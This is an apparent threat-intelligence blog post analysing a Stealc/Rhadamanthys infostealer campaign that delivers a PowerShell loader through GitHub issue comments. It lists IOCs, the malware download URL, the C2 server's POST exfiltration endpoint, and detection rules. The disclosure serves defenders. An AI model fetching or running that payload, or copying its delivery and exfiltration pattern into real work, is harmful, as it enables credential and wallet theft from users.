Stealc/Rhadamanthys: Anatomy of a GitHub Supply Chain Infostealer
- Patrick Duggan
- Nov 25, 2025
- 5 min read
Categories: Malware Analysis, Threat Intelligence, IOCs Tags: #Stealc #Rhadamanthys #Infostealer #SupplyChain #GitHub #MITRE
Executive Summary
We caught an information stealer campaign distributing malware through GitHub issue comments. This post documents the complete technical analysis: the malware family, the C2 infrastructure, the attack chain, and every IOC you need to defend your organization.
• Block `149.102.156.62` (Contabo GmbH, Germany)
• Block hash `23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68`
• Monitor for PowerShell downloading from `github.com/*/releases/download/*/`
• Subscribe to our STIX feed: `https://analytics.dugganusa.com/api/v1/stix-feed`
Malware Identification
VirusTotal Analysis
Hash (SHA256): ``` 23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68 ```
Detection Rate: 18/70 engines (25.7%)
Family Classification: | Sandbox | Classification | |---------|----------------| | CAPE Sandbox | Stealc | | Multiple AVs | Rhadamanthys | | Generic | Trojan.GenericKD.77873995 |
• `Trojan.GenericKD.77873995` (BitDefender)
• `Win64/Agent.ECK trojan` (ESET)
• `TR/AD.Nekark.wzwvf` (Avira)
• `Archive.Trojan.Agent.3AOT25` (DrWeb)
• `Win64.Trojan.Agent.Ftgl` (Tencent)
• `Malicious (score: 99)` (SecureAge)
Behavioral Tags
detect-debug-environment - Anti-analysis checks
long-sleeps - Execution delays to evade sandboxes
contains-pe - Executable payload inside ZIP
zip - Archive-based delivery
Attack Chain
┌─────────────────────────────────────────────────────────────────────────┐
│ ATTACK CHAIN DIAGRAM │
└─────────────────────────────────────────────────────────────────────────┘[1] INITIAL ACCESS [2] EXECUTION ━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━ GitHub Issue Comment PowerShell Loader │ │ ▼ ▼ ┌─────────────┐ ┌─────────────────┐ │ "Hey, try │ │ kkwerii.ps1 │ │ this fix!" │ │ │ │ │────────────────▶│ Downloads ZIP │ │ [ZIP file] │ │ from GitHub │ └─────────────┘ └────────┬────────┘ │ [3] PAYLOAD DELIVERY [4] DATA EXFIL ━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━ GitHub Releases C2 Server │ │ ▼ ▼ ┌─────────────────┐ ┌─────────────────┐ │ automatic-octo- │ │ 149.102.156.62 │ │ parakeet/ │ │ │ │ releases/ │────────────▶│ POST /5dc6... │ │ kkwerii.zip │ │ .php │ └─────────────────┘ └─────────────────┘ ```
Step-by-Step Execution
• Sleeper account posts "helpful" ZIP to GitHub issue
• Account aged 90-365 days, dormant 90-180 days
• Targets popular open source projects
• Victim downloads ZIP thinking it's a legitimate fix
• ZIP contains PowerShell loader (`kkwerii.ps1`)
• PowerShell script executes
• Downloads second-stage from GitHub Releases:
• Stealer collects credentials, crypto wallets, browser data
• Exfils via HTTP POST to C2:
Command & Control Infrastructure
C2 Server Details
| Attribute | Value | |-----------|-------| | IP Address | `149.102.156.62` | | Port | 80 (HTTP) | | Endpoint | `/5dc60508ab2db3b4.php` | | Method | POST | | Provider | Contabo GmbH | | Country | Germany (DE) | | ASN | AS51167 |
Network Indicators
Contacted IPs: ``` 149.102.156.62:80 - C2 Server (Contabo GmbH) 140.82.114.4:443 - github.com (legitimate) 185.199.109.133:443 - release-assets.githubusercontent.com (legitimate) 140.82.112.5:443 - api.github.com (legitimate) ```
DNS Lookups: ``` github.com → 140.82.114.4 release-assets.githubusercontent.com → 185.199.109.133 api.github.com → 140.82.112.5 ```
HTTP Conversations: ```http POST http://149.102.156.62/5dc60508ab2db3b4.php HTTP/1.1 [Exfiltrated data] ```
http
GET https://github.com/winchmrsmilegodsgf/automatic-octo-parakeet/releases/download/Testing/kkwerii.ps1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
What Stealc/Rhadamanthys Steals
Target Data
| Category | Specifics | |----------|-----------| | Browser Credentials | Chrome, Firefox, Edge passwords | | Browser Cookies | Session tokens, auth cookies | | Autofill Data | Credit cards, addresses, names | | Cryptocurrency Wallets | MetaMask, Exodus, Electrum, etc. | | Discord Tokens | Account takeover capability | | Telegram Sessions | Session hijacking | | Steam Credentials | Gaming account theft | | System Info | OS version, hardware, installed software | | Screenshots | Desktop capture | | Clipboard | Copy/paste monitoring |
Why Infostealers Are Dangerous
1. Immediate Impact: Stolen credentials = instant account takeover 2. Lateral Movement: Enterprise credentials → internal network access 3. Financial Loss: Crypto wallets drained immediately 4. Persistent Access: Session tokens work until rotated 5. Supply Chain Risk: One developer = access to production systems
GitHub Accounts (Suspended)
These accounts distributed the malware. All have been suspended by GitHub:
| Account | Status | Activity | |---------|--------|----------| | FireSuper | SUSPENDED | Posted malware ZIPs | | rampubg14-cmyk | SUSPENDED | Same malware hash as FireSuper | | anuxagfr | SUSPENDED | Distribution network | | winchmrsmilegodsgf | SUSPENDED | Hosted payload on GitHub Releases |
Key Finding: FireSuper and rampubg14-cmyk used the EXACT SAME malware file (identical SHA-256). This proves coordinated infrastructure.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Description | |--------|-----------|-----|-------------| | Initial Access | Phishing: Spearphishing Link | T1566.002 | GitHub issue links | | Execution | User Execution: Malicious File | T1204.002 | ZIP download | | Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | kkwerii.ps1 loader | | Defense Evasion | Obfuscated Files | T1027 | Packed executable | | Defense Evasion | Virtualization/Sandbox Evasion | T1497 | Anti-debug checks | | Credential Access | Credentials from Password Stores | T1555 | Browser credential theft | | Credential Access | Steal Web Session Cookie | T1539 | Session token theft | | Collection | Clipboard Data | T1115 | Clipboard monitoring | | Collection | Screen Capture | T1113 | Desktop screenshots | | Exfiltration | Exfiltration Over C2 Channel | T1041 | HTTP POST to C2 | | Command and Control | Application Layer Protocol: Web | T1071.001 | HTTP C2 |
Indicators of Compromise (IOCs)
File Indicators
yaml
# SHA256 Hashes
- 23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68 # Main payloadNetwork Indicators
yaml
# C2 Infrastructure
- ip: 149.102.156.62
port: 80
endpoint: /5dc60508ab2db3b4.php
method: POST
provider: Contabo GmbH
country: DEDetection Signatures
Suricata/Snort: ``` alert http $HOME_NET any -> 149.102.156.62 any (msg:"MALWARE Stealc/Rhadamanthys C2"; flow:established,to_server; content:"POST"; http_method; content:"/5dc60508ab2db3b4.php"; http_uri; classtype:trojan-activity; sid:1000001; rev:1;) ```
YARA: ```yara rule Stealc_Rhadamanthys_Loader { meta: description = "Detects Stealc/Rhadamanthys PowerShell loader" author = "DugganUSA LLC" date = "2025-11-25" hash = "23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68" strings: $ps1 = "WindowsPowerShell" ascii $url1 = "github.com" ascii $url2 = "releases/download" ascii $ext = ".ps1" ascii condition: all of them } ```
Sigma: ```yaml title: Stealc/Rhadamanthys GitHub Delivery status: experimental description: Detects PowerShell downloading from GitHub releases (common malware delivery) logsource: category: process_creation product: windows detection: selection: CommandLine|contains|all: - 'powershell' - 'github.com' - 'releases/download' condition: selection falsepositives: - Legitimate software installation scripts level: high ```
STIX 2.1 Bundle
All IOCs are available in our public STIX feed:
curl https://analytics.dugganusa.com/api/v1/stix-feed
Direct IOC queries: ```bash # Get Pattern 38 indicators curl "https://analytics.dugganusa.com/api/v1/stix-feed?min_confidence=80" | jq '.objects[] | select(.pattern | contains("149.102.156.62"))' ```
Defensive Recommendations
Immediate Actions
1. Block C2 IP: ```bash # Firewall rule iptables -A OUTPUT -d 149.102.156.62 -j DROP ```
2. Block File Hash: - Add to EDR blocklist - Add to email gateway
3. Hunt for Compromise: ```sql -- Splunk index=proxy dest_ip=149.102.156.62 | stats count by src_ip, user
-- KQL (Microsoft Sentinel) DeviceNetworkEvents | where RemoteIP == "149.102.156.62" ```
Long-term Mitigations
1. User Awareness: Don't download ZIPs from GitHub issue comments 2. PowerShell Logging: Enable ScriptBlock logging 3. Network Monitoring: Alert on connections to bulletproof hosting 4. Threat Intel Feeds: Subscribe to STIX feeds (like ours)
Timeline
| Date | Event | |------|-------| | ~Aug 2025 | Sleeper accounts created | | Nov 23, 2025 | Accounts activated, started posting malware | | Nov 23, 2025 | DugganUSA detects Pattern 38 | | Nov 24, 2025 | C2 infrastructure traced via VirusTotal | | Nov 24, 2025 | 36 reports sent to [email protected] | | Nov 25, 2025 | 4 accounts confirmed SUSPENDED | | Nov 25, 2025 | C2 IP blocked, 16 repos warned | | Nov 25, 2025 | This analysis published |
References
• VirusTotal Report: https://www.virustotal.com/gui/file/23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68
• Our STIX Feed: https://analytics.dugganusa.com/api/v1/stix-feed
• MITRE ATT&CK: https://attack.mitre.org/
• Stealc Analysis (Sekoia): https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers/
• Rhadamanthys Analysis: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
About This Analysis
• Pattern 38 Scanner (GitHub account behavior analysis)
• VirusTotal API (malware analysis)
• STIX 2.1 Feed (IOC distribution)
• Judge Dredd (automated disclosure)
Cost: $0 (existing Claude Code subscription + Azure infrastructure) Time: 48 hours from detection to full analysis
We publish this freely under our Democratic Sharing Law: threat intelligence should be accessible to everyone, not just enterprises with $50K/year subscriptions.
*"The Law doesn't sleep. Neither does our threat intel pipeline."* - Judge Dredd
Patrick Duggan DugganUSA LLC [email protected] https://www.dugganusa.com
Comments